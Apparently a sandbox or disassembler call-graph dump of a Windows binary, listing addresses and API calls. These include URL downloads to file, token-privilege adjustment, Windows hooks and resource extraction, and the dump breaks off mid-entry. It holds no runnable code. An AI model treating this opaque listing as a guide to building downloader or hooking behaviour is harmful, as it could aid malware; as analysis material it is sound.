148295->148297 148299 6bf1023b 148297->148299 148371 6bf0fd50 75 API calls 3 library calls 148297->148371 148301 6bee8514 ctype 67 API calls 148299->148301 148301->148289 148308 6bf0febc _memset 148372 6bf0e124 GetPrivateProfileStringW 148308->148372 148312 6bf0fefc _wcslen 148313 6bf0ffb7 GetPrivateProfileIntW 148312->148313 148315 6bf23f7c ctype 111 API calls 148312->148315 148318 6bf0ffeb 148313->148318 148319 6bf0ffee GetPrivateProfileIntW 148313->148319 148317 6bf0ff23 _memset 148315->148317 148373 6bf23ce4 WideCharToMultiByte 148317->148373 148318->148319 148320 6bf10019 _memset 148319->148320 148360 6befaf99 148359->148360 148360->148289 148360->148291 148362 6bf04c3c __EH_prolog3 148361->148362 148363 6bef1e98 75 API calls 148362->148363 148364 6bf04c4b 148363->148364 148365 6beed55b 75 API calls 148364->148365 148366 6bf04c59 148365->148366 148367 6bef1e98 75 API calls 148366->148367 148368 6bf04c62 148367->148368 148369 6bee8514 ctype 67 API calls 148368->148369 148370 6bf04c6e std::runtime_error::runtime_error 148369->148370 148371->148308 148372->148312 148387 6cde45e9 148388 6cde45f9 148387->148388 148389 6cde45f4 ___security_init_cookie 148387->148389 148392 6cde44f3 148388->148392 148389->148388 148391 6cde4607 148393 6cde44ff 148392->148393 148397 6cde459c 148393->148397 148398 6cde454c 148393->148398 148400 6cde43be 148393->148400 148395 6cde457c 148396 6cde43be __CRT_INIT@12 54 API calls 148395->148396 148395->148397 148396->148397 148397->148391 148398->148395 148398->148397 148399 6cde43be __CRT_INIT@12 54 API calls 148398->148399 148399->148395 148401 6cde43cd 148400->148401 148402 6cde4449 148400->148402 148434 6cde8189 HeapCreate 148401->148434 148403 6cde4480 148402->148403 148406 6cde444f 148402->148406 148407 6cde44de 148403->148407 148408 6cde4485 148403->148408 148412 6cde446f __ioterm 148406->148412 148417 6cde43d8 148406->148417 148407->148417 148442 6cdeaf17 13 API calls 2 library calls 148407->148442 148439 6cdeabe0 7 API calls __decode_pointer 148408->148439 148409 6cde43df 148436 6cdeaf87 30 API calls 4 library calls 148409->148436 148438 6cdeac31 6 API calls __decode_pointer 148412->148438 148414 6cde448a __calloc_crt 148414->148417 148418 6cde44a2 148414->148418 148415 6cde43e4 148420 6cde43ef __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA __ioinit 148415->148420 148421 6cde43e8 __heap_term 148415->148421 148417->148398 148440 6cdeab45 TlsGetValue TlsGetValue GetModuleHandleW __crt_waiting_on_module_handle GetProcAddress 148418->148440 148424 6cde4419 __setargv 148420->148424 148425 6cde4412 148420->148425 148421->148417 148423 6cde44b4 148431 6cde4437 148423->148431 148441 6cdeac6e 8 API calls __initptd 148423->148441 148427 6cde4442 __ioterm 148424->148427 148428 6cde4422 __setenvp 148424->148428 148437 6cdeac31 6 API calls __decode_pointer 148425->148437 148427->148425 148428->148427 148430 6cde442b __cinit 148428->148430 148430->148427 148430->148431 148431->148417 148433 6cde44c2 GetCurrentThreadId 148433->148417 148435 6cde43d3 148434->148435 148435->148409 148435->148417 148436->148415 148439->148414 148440->148423 148441->148433 148442->148417 148443 6bf18bcb 148448 6bf18bdd __write_nolock 148443->148448 148444 6bf18da5 148445 6bf16afb GetTickCount 148444->148445 148446 6bf18db4 148445->148446 148447 6befb865 ctype 111 API calls 148446->148447 148450 6bf18dc3 WSAGetLastError 148447->148450 148448->148444 148449 6bf18cbf 148448->148449 148455 6bf23f7c ctype 111 API calls 148448->148455 148475 6bf1801b 99 API calls 4 library calls 148448->148475 148476 6bf16b45 121 API calls 148448->148476 148449->148444 148453 6bf23f7c ctype 111 API calls 148449->148453 148457 6bf23f7c ctype 111 API calls 148450->148457 148454 6bf18d78 148453->148454 148454->148444 148477 6bf0e9ed 121 API calls 148454->148477 148455->148448 148459 6bf18e2a 148457->148459 148460 6bee8514 ctype 67 API calls 148459->148460 148461 6bf18e3d 148460->148461 148462 6bf18e73 148461->148462 148463 6bf18e55 GetTickCount GetTickCount GetTickCount 148461->148463 148464 6bf18e87 148462->148464 148478 6bf2db1d 114 API calls ctype 148462->148478 148463->148462 148474 6bf16ef2 GetTickCount 148464->148474 148467 6bf18ea0 148474->148467 148475->148448 148476->148448 148477->148444 148478->148464 148479 6bf329c9 148504 6bf38e24 148479->148504 148481 6bf329d5 GetTickCount 148482 6bf23f7c ctype 111 API calls 148481->148482 148483 6bf329f1 148482->148483 148484 6bf32afd std::runtime_error::runtime_error 148483->148484 148485 6befb0e4 68 API calls 148483->148485 148486 6bf32a03 148485->148486 148487 6bf38425 ctype 75 API calls 148486->148487 148498 6bf32a43 148486->148498 148492 6bf32a11 148487->148492 148488 6bf32aa3 148490 6bf32ac5 148488->148490 148514 6bf3258e 114 API calls 148488->148514 148489 6bf38425 ctype 75 API calls 148495 6bf32a6c 148489->148495 148490->148484 148497 6beeb9b7 759 API calls 148490->148497 148505 6bf3305e 148492->148505 148496 6bf3305e 116 API calls 148495->148496 148499 6bf32a97 148496->148499 148500 6bf32af2 148497->148500 148498->148488 148498->148489 148499->148488 148513 6bf330ca 114 API calls ctype 148499->148513 148500->148484 148515 6bf3258e 114 API calls 148500->148515 148504->148481 148506 6bf33099 148505->148506 148507 6bf33078 htonl htons 148505->148507 148508 6bf2c674 114 API calls 148506->148508 148507->148506 148509 6bf330ae 148508->148509 148510 6bf384d6 _strlwr_s_l_stat 5 API calls 148509->148510 148513->148488 148514->148490 148515->148484 148527 b96979 148528 b96985 _setlocale 148527->148528 148529 b969af 148528->148529 148530 b96990 148528->148530 148532 ba4e30 __getptd 67 API calls 148529->148532 148603 b998d1 67 API calls __getptd_noexit 148530->148603 148534 b969b4 148532->148534 148533 b96995 148604 b9a5b1 6 API calls 2 library calls 148533->148604 148563 b95b21 148534->148563 148537 b969be 148538 ba05db __calloc_crt 67 API calls 148537->148538 148564 b95b2d _setlocale 148563->148564 148565 ba4e30 __getptd 67 API calls 148564->148565 148566 b95b32 148565->148566 148567 b95b60 148566->148567 148568 b95b44 148566->148568 148569 ba339f __lock 67 API calls 148567->148569 148570 ba4e30 __getptd 67 API calls 148568->148570 148571 b95b67 148569->148571 148572 b95b49 148570->148572 148612 b95ae3 75 API calls 3 library calls 148571->148612 148575 b95b57 _setlocale 148572->148575 148611 b97051 67 API calls 3 library calls 148572->148611 148574 b95b7a 148613 b95b8b LeaveCriticalSection _doexit 148574->148613 148575->148537 148603->148533 148611->148575 148612->148574 148613->148572 148725 6bf055b1 148738 6bf04e4f 148725->148738 148728 6bf23f0c 111 API calls 148729 6bf055d2 148728->148729 148730 6bf055f4 148729->148730 148731 6bf055e8 CreateEventW 148729->148731 148732 6bf05600 148730->148732 148733 6bf055f8 CreateEventW 148730->148733 148731->148730 148761 6bef7a1f 148732->148761 148733->148732 148736 6bf27367 24 API calls 148737 6bf05617 148736->148737 148740 6bf04e5b __EH_prolog3_GS ctype 148738->148740 148739 6bf38f10 ctype 5 API calls 148741 6bf04f74 148739->148741 148742 6bf04c30 75 API calls 148740->148742 148759 6bf04e65 148740->148759 148741->148728 148743 6bf04ea1 148742->148743 148744 6bee8fa1 ctype 75 API calls 148743->148744 148745 6bf04eb4 148744->148745 148746 6bee8514 ctype 67 API calls 148745->148746 148747 6bf04ec4 148746->148747 148748 6befaf8a GetFileAttributesW 148747->148748 148749 6bf04ed6 148748->148749 148750 6bf04f45 148749->148750 148751 6bf26dcb 13 API calls 148749->148751 148753 6bee8514 ctype 67 API calls 148750->148753 148752 6bf04ee0 148751->148752 148754 6bf04ee6 148752->148754 148755 6bf04efe RegQueryValueExW 148752->148755 148753->148759 148756 6bee8514 ctype 67 API calls 148754->148756 148757 6bf04f27 148755->148757 148758 6bf04f3e RegCloseKey 148755->148758 148756->148759 148757->148758 148758->148750 148759->148739 148764 6bef79b9 RegOpenKeyExA 148761->148764 148765 6bef7a1a 148764->148765 148766 6bef79e4 RegQueryValueExA 148764->148766 148765->148736 148767 6bef7a0b GetLastError 148766->148767 148768 6bef7a11 RegCloseKey 148766->148768 148767->148768 148768->148765 148769 6cd89c1c 148770 6cd89c3f SmartDisableIME 148769->148770 148771 6cd89c25 RegisterClipboardFormatW 148769->148771 148771->148770 148772 b5ecf0 148773 b5ecfc __EH_prolog3 148772->148773 148790 b5b33c KillTimer 148773->148790 148775 b5ed06 148791 b7a3ab 148775->148791 148777 b5ed16 148796 b5ec81 148777->148796 148790->148775 148811 b7a21d 148791->148811 148794 b7a3ca 148794->148777 148834 b5b670 148796->148834 148798 b5ec8f 148799 b5ec96 GetModuleHandleW 148798->148799 148800 b5ec9f FindResourceW 148798->148800 148799->148800 148812 b7a227 148811->148812 148813 b7a25b 148811->148813 148814 b7a237 148812->148814 148815 b7a22e DeleteObject 148812->148815 148813->148794 148818 b7a2d7 FindResourceW 148813->148818 148816 b7a242 DeleteFileW 148814->148816 148817 b7a23c 148814->148817 148815->148816 148816->148813 148817->148816 148819 b7a2f5 148818->148819 148820 b7a2fc SizeofResource 148818->148820 148819->148794 148820->148819 148821 b7a30d LoadResource LockResource 148820->148821 148821->148819 148822 b7a325 GlobalAlloc 148821->148822 148823 b7a336 GlobalLock 148822->148823 148824 b7a333 148822->148824 148825 b7a353 _setlocale 148823->148825 148826 b7a341 GlobalUnlock 148823->148826 148827 b7a349 GlobalFree 148824->148827 148828 b7a35d GlobalUnlock 148825->148828 148826->148827 148827->148819 148833 b3846c 148828->148833 148835 b5b67d ctype 148834->148835 148836 b5b692 ctype 148835->148836 148837 b5b689 DeleteObject 148835->148837 148836->148798 148837->148836 149016 6bf36eba 149017 6bf36ecb 149016->149017 149018 6bf36ee5 149016->149018 149017->149018 149019 6bf36ed7 htonl 149017->149019 149019->149018 149020 6bf36ef9 htons 149019->149020 149021 6bf36f0a 149020->149021 149022 6bf36f19 htonl 149020->149022 149024 6bf36cdd 149021->149024 149022->149018 149066 6bf2ca6e 6 API calls ctype 149024->149066 149026 6bf36d0e 149067 6bf2cd22 6 API calls 149026->149067 149028 6bf36d19 149029 6bf1ef1e ctype 6 API calls 149028->149029 149051 6bf36d22 149029->149051 149030 6bf36de4 htons 149031 6bf36e0f 149030->149031 149032 6bf36dff 149030->149032 149043 6bf33dac 6 API calls 149043->149051 149051->149030 149051->149043 149052 6bf36d6f 149051->149052 149060 6bf1ef1e ctype 6 API calls 149051->149060 149062 6bf36d6d 149051->149062 149072 6bf33e48 6 API calls ctype 149051->149072 149073 6bf2cd22 6 API calls 149051->149073 149074 6bf33dac 6 API calls ctype 149052->149074 149060->149051 149062->149030 149066->149026 149067->149028 149072->149051 149073->149051 149103 b688fc 149106 b68847 149103->149106 149107 b68859 149106->149107 149108 b68887 149106->149108 149109 b68865 149107->149109 149110 b6888c 149107->149110 149146 b682c9 103 API calls 3 library calls 149109->149146 149111 b68895 149110->149111 149112 b688b0 149110->149112 149122 b6878e 149111->149122 149114 b688c3 149112->149114 149115 b688ca 149112->149115 149119 b68879 149112->149119 149147 b684c1 105 API calls 4 library calls 149114->149147 149115->149119 149120 b688d4 149115->149120 149119->149108 149149 b6826c 26 API calls 149119->149149 149148 b674f8 86 API calls 149120->149148 149123 b6879e 149122->149123 149124 b687c2 149123->149124 149125 b687ab 149123->149125 149128 b2b9b4 86 API calls 149124->149128 149130 b687d0 149124->149130 149177 b2b9b4 149125->149177 149128->149130 149129 b687de 149150 b68541 149129->149150 149184 b67a3b 43 API calls 149130->149184 149132 b687b2 149183 b68664 167 API calls 3 library calls 149132->149183 149136 b687c0 149136->149130 149146->149119 149147->149108 149148->149108 149149->149108 149151 b6854d __EH_prolog3 149150->149151 149152 b6856a 149151->149152 149153 b1bf10 78 API calls 149151->149153 149154 b68582 149152->149154 149155 b68599 149152->149155 149153->149152 149178 b2b9c0 __EH_prolog3 149177->149178 149180 b2b9eb std::locale::_Init 149178->149180 149207 b851d2 86 API calls 3 library calls 149178->149207 149180->149132 149181 b2b9e1 149208 b94f89 74 API calls _AtModuleExit 149181->149208 149183->149136 149184->149129 149207->149181 149208->149180 149209 6bf336b9 149214 6befaaaf 149209->149214 149215 6befaae0 _memset 149214->149215 149227 6befa873 149215->149227 149218 6befab0a 149238 6befa93b 104 API calls 4 library calls 149218->149238 149219 6befab11 149239 6bf3b8e5 103 API calls 3 library calls 149219->149239 149222 6befab0f _memcpy_s 149223 6bf384d6 _strlwr_s_l_stat 5 API calls 149222->149223 149224 6befab4c 149223->149224 149225 6befb071 gethostbyname 149224->149225 149228 6befa885 __write_nolock 149227->149228 149229 6befa8a1 GetAdaptersInfo 149228->149229 149230 6befa89d 149228->149230 149229->149230 149233 6befa8bc 149229->149233 149231 6bf384d6 _strlwr_s_l_stat 5 API calls 149230->149231 149232 6befa8f4 149231->149232 149232->149218 149232->149219 149233->149230 149233->149233 149234 6befa8fc GetTickCount 149233->149234 149235 6befa917 149234->149235 149237 6befa936 149235->149237 149240 6bf3b8e5 103 API calls 3 library calls 149235->149240 149237->149230 149238->149222 149239->149222 149240->149235 149241 b476fe 149248 b4770c 149241->149248 149242 b47797 149267 b46180 GetWindowLongW 149242->149267 149246 b477c9 GetDlgItem 149285 b46c96 149246->149285 149248->149242 149250 b47736 SetWindowPos 149248->149250 149298 b3e185 GetDC 149250->149298 149254 b47755 149256 b95546 std::locale::_Init 75 API calls 149254->149256 149258 b4776e 149256->149258 149260 b47781 149258->149260 149263 b47323 4 API calls 149258->149263 149299 b3e1a1 ReleaseDC DeleteDC 149260->149299 149263->149260 149268 b461a4 149267->149268 149269 b461c1 GetWindowRect 149267->149269 149270 b461b5 GetWindow 149268->149270 149271 b461ab GetParent 149268->149271 149272 b461d6 149269->149272 149273 b4624a GetParent GetClientRect GetClientRect MapWindowPoints 149269->149273 149274 b461bf 149270->149274 149271->149274 149275 b461da GetWindowLongW 149272->149275 149278 b461e6 MonitorFromWindow 149272->149278 149282 b46231 SetWindowPos 149273->149282 149274->149269 149275->149278 149277 b4620d GetMonitorInfoW 149279 b46206 GetClientRect 149277->149279 149280 b46223 149277->149280 149278->149277 149278->149279 149284 b56576 149279->149284 149280->149282 149283 b4623d GetWindowRect 149280->149283 149282->149279 149283->149282 149284->149246 149286 b46c9f 149285->149286 149287 b277af 18 API calls 149286->149287 149288 b46cab 149287->149288 149298->149254 149299->149242 149300 b65afa 149305 b65894 149300->149305 149303 b65b35 149304 b65b13 MoveWindow 149304->149303 149306 b277af 18 API calls 149305->149306 149307 b658a3 149306->149307 149308 b658a7 SetLastError 149307->149308 149309 b658b3 149307->149309 149311 b658e0 149308->149311 149310 b29677 4 API calls 149309->149310 149312 b658c2 CreateDialogParamW 149310->149312 149311->149303 149311->149304 149312->149311 149313 6cddc60d 149317 6cddc56d 149313->149317 149314 6cddc58a GetProcessHeap HeapAlloc 149318 6cddc59f 149314->149318 149319 6cddc5c3 149314->149319 149315 6cddc5a1 RtlInterlockedPopEntrySList 149316 6cddc5ac VirtualAlloc 149315->149316 149323 6cddc608 149315->149323 149316->149319 149320 6cddc5c7 RtlInterlockedPopEntrySList 149316->149320 149317->149314 149317->149315 149317->149319 149321 6cddc5ec 149320->149321 149322 6cddc5dc VirtualFree 149320->149322 149324 6cddc5f4 RtlInterlockedPushEntrySList 149321->149324 149322->149323 149324->149323 149324->149324 149325 b54fe4 149328 b54c25 149325->149328 149329 b54c37 149328->149329 149349 b54c64 149328->149349 149330 b54c47 149329->149330 149331 b54c6c 149329->149331 149351 b5358f 149330->149351 149332 b54c74 149331->149332 149333 b54c96 149331->149333 149360 b5460f GetScrollInfo GetScrollRange GetScrollRange GetScrollPos SetScrollPos 149332->149360 149334 b54c9b 149333->149334 149335 b54cba 149333->149335 149361 b541b0 10 API calls 149334->149361 149337 b54ccc 149335->149337 149338 b54cbf 149335->149338 149339 b54cff 149337->149339 149347 b54cd4 149337->149347 149362 b54307 75 API calls 149338->149362 149341 b54c53 149339->149341 149342 b54d08 149339->149342 149341->149349 149365 b583f6 17 API calls 149341->149365 149364 b54348 79 API calls 149342->149364 149363 b543f9 6 API calls 149347->149363 149348 b54d1b 149348->149341 149352 b5359a 149351->149352 149353 b535aa GetWindowLongW SetWindowLongW SetFocus 149352->149353 149366 b530a3 149353->149366 149355 b535d6 GetCurrentThreadId 149379 b47ef3 EnterCriticalSection 149355->149379 149360->149341 149361->149341 149362->149341 149363->149341 149364->149348 149365->149349 149367 b530af __EH_prolog3 149366->149367 149368 b530d3 SetWindowPos 149367->149368 149372 b53140 std::locale::_Init 149367->149372 149390 b3e185 GetDC 149368->149390 149370 b530f6 149371 b95546 std::locale::_Init 75 API calls 149370->149371 149373 b53110 149371->149373 149372->149355 149418 b47ddc 149379->149418 149390->149370 149419 b47de8 149418->149419 149425 6bf2e920 CreateEventW 149426 6bf3ac74 ctype 759 API calls 149425->149426 149427 6bf2e945 149426->149427 149428 6bf2e953 WaitForSingleObject CloseHandle 149427->149428 149429 6bf2e94f 149427->149429 149428->149429 149430 6beef3bd 149431 6beef3cf __write_nolock 149430->149431 149432 6beef3ee 149431->149432 149446 6beed949 149431->149446 149434 6bf384d6 _strlwr_s_l_stat 5 API calls 149432->149434 149435 6beef5ae 149434->149435 149436 6beef413 149436->149432 149437 6bee9134 ctype 75 API calls 149436->149437 149438 6beef45f GetTickCount 149437->149438 149439 6bee9134 ctype 75 API calls 149438->149439 149441 6beef48b _wcsncpy 149439->149441 149444 6beef4e5 149441->149444 149460 6bf3b8b9 102 API calls __toupper_l 149441->149460 149447 6beed95c _wcslen 149446->149447 149461 6bf4dd60 149447->149461 149449 6beed967 _wcslen 149450 6beed96e _wcsncpy 149449->149450 149469 6bf3b701 78 API calls __wcstoi64 149449->149469 149450->149436 149460->149441 149462 6bf4ddf0 149461->149462 149463 6bf4dd71 149461->149463 149472 6bf4dc76 79 API calls 3 library calls 149462->149472 149465 6bf4dd98 149463->149465 149470 6bf3dc8c 67 API calls __getptd_noexit 149463->149470 149465->149449 149467 6bf4dd88 149471 6bf38356 6 API calls 2 library calls 149467->149471 149469->149450 149470->149467 149472->149465 149473 6bef4f3b 149474 6bef4f4d __write_nolock 149473->149474 149475 6bf3ab44 ctype 75 API calls 149474->149475 149476 6bef4f8f 149475->149476 149477 6bef4fa7 GetLastError 149476->149477 149478 6bef4fe0 149476->149478 149598 6bf2405e 111 API calls 3 library calls 149477->149598 149480 6bf3ab44 ctype 75 API calls 149478->149480 149481 6bef4fef 149480->149481 149482 6bef5004 149481->149482 149483 6bf1bfae 76 API calls 149481->149483 149485 6bef5059 149482->149485 149486 6bef5017 149482->149486 149483->149482 149484 6bf384d6 _strlwr_s_l_stat 5 API calls 149487 6bef55c4 149484->149487 149489 6bef5066 149485->149489 149490 6bef5143 149485->149490 149599 6bef1db7 67 API calls ctype 149486->149599 149493 6bef5074 149489->149493 149601 6bef02ce 75 API calls 3 library calls 149489->149601 149492 6bef514b 149490->149492 149607 6bef1d5e 6 API calls 149490->149607 149491 6bef5020 GetLastError 149600 6bf2405e 111 API calls 3 library calls 149491->149600 149613 6bef0b64 121 API calls ctype 149492->149613 149603 6bef02ce 75 API calls 3 library calls 149493->149603 149498 6bef515c 149514 6bef5173 149498->149514 149608 6bef0b64 121 API calls ctype 149498->149608 149500 6bef5084 149501 6bef508c 149500->149501 149502 6bef5260 149500->149502 149602 6bef16a5 69 API calls 2 library calls 149501->149602 149588 6bef450d 149502->149588 149503 6bef523a 149614 6bef02ce 75 API calls 3 library calls 149503->149614 149504 6bef50d6 149604 6bef02ce 75 API calls 3 library calls 149504->149604 149511 6bef5093 149512 6bef524e 149512->149502 149514->149502 149609 6bef0b64 121 API calls ctype 149514->149609 149515 6bef50eb 149515->149502 149526 6bef51a0 149526->149502 149543 6bef4fc3 149543->149484 149589 6bef451f 149588->149589 149598->149543 149599->149491 149600->149543 149601->149500 149602->149511 149603->149504 149604->149515 149607->149498 149608->149514 149609->149526 149613->149503 149614->149512 149647 b6566f 149654 b296d7 149647->149654 149650 b656b7 149651 b277af 18 API calls 149652 b6569c SetWindowLongW 149651->149652 149660 b55e24 CallWindowProcW 149652->149660 149655 b296e4 149654->149655 149656 b296e8 EnterCriticalSection 149654->149656 149655->149650 149655->149651 149657 b29704 GetCurrentThreadId 149656->149657 149658 b2970c 149656->149658 149657->149658 149659 b283c2 LeaveCriticalSection 149658->149659 149659->149655 149660->149650 149661 b6316a 149664 b630a1 149661->149664 149663 b6318e 149665 b630ad 149664->149665 149667 b630b3 149664->149667 149665->149667 149668 b62f2f 149665->149668 149667->149663 149669 b62f3e __EH_prolog3_GS 149668->149669 149670 b47451 BeginPaint 149669->149670 149671 b62f53 GetClientRect 149670->149671 149672 b47323 4 API calls 149671->149672 149673 b62f7e 149672->149673 149674 b56537 GetWindowRect 149673->149674 149675 b62f92 149674->149675 149682 b47395 DeleteObject BitBlt SelectObject DeleteDC ctype 149675->149682 149677 b62fce 149683 b4747c EndPaint 149677->149683 149679 b62fd6 149682->149677 149683->149679 149684 6bef6f32 149691 6bef6f44 _memset __write_nolock _wcsncpy 149684->149691 149688 6bef640d 179 API calls 149688->149691 149691->149688 149695 6bef6fb5 _wcsncpy 149691->149695 149722 6bf3b060 149691->149722 149697 6bef640d 149695->149697 149698 6bef6419 __EH_prolog3_GS 149697->149698 149727 6bef313b 149698->149727 149723 6bf3b078 149722->149723 149724 6bf3b09f __VEC_memcpy 149723->149724 149725 6bf3b0a7 149723->149725 149724->149725 149725->149691 149728 6bef3147 __EH_prolog3_GS 149727->149728 149729 6bee9252 ctype 75 API calls 149728->149729 149730 6bef315a 149729->149730 149731 6bef3181 149730->149731 149732 6bef3170 149730->149732 149734 6bef272e ctype 75 API calls 149731->149734 149733 6bef1e98 75 API calls 149732->149733 149735 6bef317b 149733->149735 149736 6bef3192 149734->149736 149737 6bee8514 ctype 67 API calls 149735->149737 149752 6bf3ccdc 79 API calls 2 library calls 149736->149752 149739 6bef31ff 149737->149739 149740 6bf38f10 ctype 5 API calls 149739->149740 149741 6bef31aa 149742 6bee8514 ctype 67 API calls 149741->149742 149752->149741 149753 b3ddd1 149756 b3dde3 _memset 149753->149756 149754 b3ddfb 149755 b94647 __except1 5 API calls 149754->149755 149757 b3de83 149755->149757 149756->149754 149761 b9573e 149756->149761 149759 b3de34 _wcslen 149760 b3de4d SHFileOperationW 149759->149760 149760->149754 149766 b95750 149761->149766 149762 b95754 149764 b95759 149762->149764 149770 b998d1 67 API calls __getptd_noexit 149762->149770 149764->149759 149765 b95770 149771 b9a5b1 6 API calls 2 library calls 149765->149771 149766->149762 149766->149764 149768 b957a0 149766->149768 149768->149764 149772 b998d1 67 API calls __getptd_noexit 149768->149772 149770->149765 149772->149765 149773 b329d7 149774 b329e1 149773->149774 149775 b329e5 TlsGetValue 149773->149775 149778 b316e2 149774->149778 149775->149774 149779 b316f7 149778->149779 149782 b31709 149778->149782 149785 b2de82 __VEC_memcpy ___sbh_free_block 149779->149785 149781 b317cb 149782->149781 149783 b3174e GetTickCount 149782->149783 149784 b3175f 149783->149784 149784->149781 149785->149782 149786 6cd3e2b7 149787 6cd3e2c1 149786->149787 149788 6cd3e2ce 149787->149788 149789 6cd3e31d lstrlenW 149787->149789 149790 6cd3e2de FindFirstFileW 149788->149790 149789->149788 149795 6cd3e328 149789->149795 149791 6cd3e2f4 GetFullPathNameW 149790->149791 149790->149795 149792 6cd3e30a 149791->149792 149793 6cd3e32c _wcsrchr _wcsrchr 149791->149793 149794 6cd3e311 SetLastError 149792->149794 149793->149795 149794->149795 149796 b467d0 PostMessageW 149797 6beea40a 149804 6bee7a1f GetCurrentProcess OpenProcessToken 149797->149804 149805 6bee7a4b GetLastError 149804->149805 149806 6bee7a53 LookupPrivilegeValueW 149804->149806 149807 6bee7ac5 149805->149807 149808 6bee7a65 CloseHandle 149806->149808 149809 6bee7a70 AdjustTokenPrivileges 149806->149809 149812 6bee888b 149807->149812 149808->149805 149810 6bee7aa9 CloseHandle GetLastError 149809->149810 149811 6bee7ab7 CloseHandle 149809->149811 149810->149807 149811->149807 149813 6bee8897 __EH_prolog3_catch ctype 149812->149813 149815 6bee8914 CreateWaitableTimerW 149813->149815 149830 6bf3848a RaiseException 149813->149830 149816 6bee893d SetWaitableTimer 149815->149816 149817 6bee8927 GetLastError 149815->149817 149818 6bee896f CreateMutexW 149816->149818 149819 6bee8959 GetLastError 149816->149819 149817->149813 149820 6bee897f GetLastError 149818->149820 149821 6bee8995 CreateSemaphoreW 149818->149821 149819->149813 149820->149813 149822 6bee89ac GetLastError 149821->149822 149823 6bee89c2 CreateSemaphoreW 149821->149823 149822->149823 149824 6bee89e7 CreateEventW 149823->149824 149825 6bee89d1 GetLastError 149823->149825 149826 6bee89fc GetLastError 149824->149826 149827 6bee8a12 CreateEventW 149824->149827 149825->149824 149826->149827 149828 6bee8a21 GetLastError 149827->149828 149829 6bee8a37 std::runtime_error::runtime_error 149827->149829 149828->149829 149830->149813 149831 b568d3 149832 b568dc 149831->149832 149833 b568fc ctype 149831->149833 149832->149833 149837 b56817 InternetGetConnectedState 149832->149837 149835 b568eb 149835->149833 149842 b5683d 149835->149842 149838 b5682b 149837->149838 149839 b56831 149838->149839 149851 b567a4 69 API calls 2 library calls 149838->149851 149839->149835 149841 b5683b 149841->149835 149843 b5687a 149842->149843 149844 b5685e 149842->149844 149846 b94647 __except1 5 API calls 149843->149846 149844->149843 149845 b5688a _memset 149844->149845 149847 b5686c URLDownloadToFileW 149844->149847 149849 b568a5 URLDownloadToCacheFileW 149845->149849 149848 b56888 149846->149848 149847->149843 149848->149833 149849->149843 149850 b568c1 DeleteFileW 149849->149850 149850->149843 149851->149841 149852 6cd51c33 149860 6cdde86c 149852->149860 149854 6cd51c57 GdiplusStartup 149855 6cd51c80 149854->149855 149856 6cd51cb4 _memset GetCurrentDirectoryW 149855->149856 149857 6cd51c8a 149855->149857 149858 6cd51ce0 149856->149858 149858->149857 149859 6cd51d0a GetCurrentThreadId SetWindowsHookExW 149858->149859 149859->149857 149860->149854 149861 b3ead4 149862 b3eaf9 149861->149862 149868 b49590 149862->149868 149871 b674a9 149862->149871 149863 b3eb5e SetWindowLongW 149864 b3eb50 149863->149864 149865 b3eb18 149865->149863 149865->149864 149874 b49245 149868->149874 149870 b495b4 149870->149865 150769 b672a9 149871->150769 149873 b674cd 149873->149865 149875 b49258 149874->149875 149901 b492bb 149874->149901 149876 b492c2 149875->149876 149877 b4928d 149875->149877 149878 b492e9 149876->149878 149879 b492ca 149876->149879 149924 b48f5a GetWindowLongW GetWindowLongW 149877->149924 149880 b49361 149878->149880 149881 b492f1 149878->149881 149980 b47656 9 API calls __except1 149879->149980 149883 b49383 149880->149883 149884 b4936a 149880->149884 149888 b4931f 149881->149888 149889 b49328 149881->149889 149881->149901 149885 b493a7 149883->149885 149886 b4938c 149883->149886 149983 b46727 224 API calls 149884->149983 149891 b493e1 149885->149891 149892 b493cd 149885->149892 149885->149901 149963 b491eb 149886->149963 149981 b459be 154 API calls 149888->149981 149895 b49332 149889->149895 149896 b492aa 149889->149896 149891->149901 149902 b49407 149891->149902 149903 b4941b 149891->149903 149974 b46659 IsWindowVisible 149892->149974 149982 b48edf 90 API calls 149895->149982 149896->149901 149991 b47dff 24 API calls 149896->149991 149899 b4937e 149899->149896 149900 b49339 149900->149901 149901->149870 149984 b48f3b 159 API calls 149902->149984 149904 b49424 149903->149904 149912 b4943b 149903->149912 149985 b45c31 8 API calls 149904->149985 149908 b4944d 149912->149908 149986 b4800a 74 API calls 149912->149986 149992 b47927 149924->149992 149964 b49226 149963->149964 149965 b491f8 149963->149965 149966 b49224 149964->149966 150488 b48e84 156 API calls 149964->150488 149965->149966 149967 b49202 GetTickCount 149965->149967 149966->149901 149968 b2b9b4 86 API calls 149967->149968 149975 b46678 149974->149975 149976 b46669 Shell_NotifyIconW 149974->149976 149975->149901 149976->149975 149980->149896 149981->149901 149982->149900 149983->149899 149984->149901 149985->149900 149986->149908 149991->149901 149993 b47938 GetWindowLongW 149992->149993 149995 b47966 149993->149995 149996 b4795a 149993->149996 149997 b4799d GetDlgItem IsWindow 149995->149997 150112 b462fa GetWindowLongW 149995->150112 150120 b3d5cf GetWindowLongW SetWindowLongW SetWindowPos 149996->150120 150000 b479d2 149997->150000 150001 b479b8 149997->150001 150116 b45ea9 150000->150116 150001->150000 150004 b479ca 150001->150004 150121 b46019 DestroyWindow 150004->150121 150006 b4798e SendMessageW 150006->149997 150113 b46317 SendMessageW 150112->150113 150114 b4631b SetWindowLongW 150112->150114 150113->149997 150113->150006 150114->150113 150115 b46330 SetWindowPos 150114->150115 150115->150113 150117 b45eb2 150116->150117 150118 b45eb8 GetClientRect 150116->150118 150120->149995 150121->150000 150488->149966 150770 b672bb 150769->150770 150792 b672e1 150769->150792 150771 b672d0 150770->150771 150772 b67411 150770->150772 150775 b672da 150771->150775 150776 b672e9 150771->150776 150773 b67439 150772->150773 150774 b67419 150772->150774 150779 b67442 150773->150779 150780 b6745b 150773->150780 150862 b66f7f CreateSolidBrush 150774->150862 150880 b66c41 118 API calls 4 library calls 150775->150880 150777 b672f3 150776->150777 150778 b672fc 150776->150778 150881 b66d32 121 API calls 4 library calls 150777->150881 150783 b67306 150778->150783 150784 b6730f 150778->150784 150887 b65e20 80 API calls 5 library calls 150779->150887 150786 b67464 150780->150786 150801 b67478 150780->150801 150882 b66dd6 127 API calls 4 library calls 150783->150882 150789 b67322 150784->150789 150790 b67319 150784->150790 150888 b65cff 81 API calls 4 library calls 150786->150888 150796 b67335 150789->150796 150797 b6732c 150789->150797 150883 b671b5 218 API calls 150790->150883 150792->149873 150793 b6730d 150793->150792 150794 b6737a 150794->150792 150851 b65b3b 26 API calls 150794->150851 150799 b6733f 150796->150799 150800 b67348 150796->150800 150884 b66ae2 121 API calls 5 library calls 150797->150884 150885 b65aae 97 